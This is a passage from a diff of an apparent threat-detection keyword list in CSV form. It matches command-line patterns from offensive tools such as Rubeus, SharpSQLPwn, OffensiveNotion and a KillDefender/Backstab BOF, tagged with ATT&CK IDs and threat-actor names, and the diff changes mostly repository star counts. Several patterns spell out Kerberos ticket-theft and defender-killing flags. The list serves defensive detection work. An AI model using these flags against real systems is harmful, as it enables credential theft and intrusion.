T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "* /.exegol/*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* /altservice:ldap *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /asrepkey*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /altservice:ldap *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /asrepkey*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* /cmdtech:* /cmd:* /impuser:*","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/lefayjey/SharpSQLPwn","1","0","N/A","N/A","1","74","15","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z" "* /cmdtech:* /cmd:* /query:*","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/lefayjey/SharpSQLPwn","1","0","N/A","N/A","1","74","15","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z" "* /create /tn Notion /tr \*cmd.exe* -c *\* /sc onlogon /ru System\*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" -"* /createnetonly:*cmd.exe*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /createnetonly:*cmd.exe*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /credpassword*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /creduser:* /credpassword:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /impersonateuser:* /msdsspn:* /ptt*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /ldap * /printcmd*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /ldapfilter:'admincount=1'*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /createnetonly:*cmd.exe*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /createnetonly:*cmd.exe*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /credpassword*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /creduser:* /credpassword:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /impersonateuser:* /msdsspn:* /ptt*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /ldap * /printcmd*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /ldapfilter:'admincount=1'*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* /modules:* /target:* /linkedsql:*","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/lefayjey/SharpSQLPwn","1","0","N/A","N/A","1","74","15","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z" "* /NAME:* /KILL*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" -"* /nofullpacsig *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /outfile:* /spn:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /outfile:* /spns:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /nofullpacsig *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /outfile:* /spn:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /outfile:* /spns:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* /PID:* /DRIVER:*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "* /PID:* /KILL*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" -"* /pwdsetafter:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /pwdsetbefore:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /rc4opsec *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /s4uproxytarget*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /s4utransitedservices*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /service:krbtgt *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /simple * /spn*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /ticket *.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /ticket:* /autoenterprise *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /ticket:*.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /pwdsetafter:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /pwdsetbefore:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /rc4opsec *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /s4uproxytarget*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /s4utransitedservices*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 